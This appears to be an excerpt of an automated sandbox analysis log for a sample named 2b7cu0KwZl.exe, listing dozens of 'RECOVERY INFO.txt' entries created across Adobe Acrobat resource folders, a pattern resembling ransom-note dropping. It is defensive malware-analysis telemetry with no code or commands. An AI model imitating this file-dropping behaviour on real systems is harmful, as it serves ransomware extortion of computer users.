Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\fr-fr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\fr-ma\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\hr-hr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\hu-hu\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\it-it\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\ja-jp\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\ko-kr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\nb-no\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\nl-nl\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\pl-pl\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\pt-br\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\ro-ro\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\root\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\ru-ru\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\sk-sk\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\sl-si\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\sv-se\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\tr-tr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\uk-ua\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\zh-cn\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\zh-tw\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\css\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\images\themes\dark\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\images\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ca-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\cs-cz\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\da-dk\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\de-de\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\en-ae\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\en-il\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\es-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\eu-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\fi-fi\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\fr-fr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\fr-ma\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\hr-hr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\hu-hu\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\it-it\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ja-jp\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ko-kr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\nb-no\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\nl-nl\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\pl-pl\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\pt-br\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ro-ro\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\root\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ru-ru\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\sk-sk\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\sl-si\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\sv-se\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\tr-tr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\uk-ua\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\zh-cn\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\zh-tw\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\plugins\rhp\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\css\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\themes\dark\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ca-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\cs-cz\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\da-dk\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\de-de\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\en-ae\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\en-il\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\es-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\eu-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\fi-fi\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\fr-fr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\fr-ma\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\hr-hr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\hu-hu\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\it-it\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ja-jp\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ko-kr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\nb-no\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\nl-nl\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\pl-pl\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\pt-br\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ro-ro\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\root\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ru-ru\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\sk-sk\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\sl-si\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\sv-se\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\tr-tr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\uk-ua\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\zh-cn\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\zh-tw\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\plugins\rhp\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\dc-annotations\js\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\css\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ca-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\cs-cz\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\da-dk\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\de-de\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\en-ae\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\en-gb\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\en-il\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\es-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\eu-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\fi-fi\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\fr-fr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\fr-ma\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\hr-hr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\hu-hu\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\it-it\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ja-jp\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ko-kr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\nb-no\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\nl-nl\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\pl-pl\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\pt-br\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ro-ro\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\root\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ru-ru\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\sk-sk\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\sl-si\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\sv-se\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\tr-tr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\uk-ua\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\zh-cn\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\zh-tw\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\RECOVERY INFO.txtJump to behavior
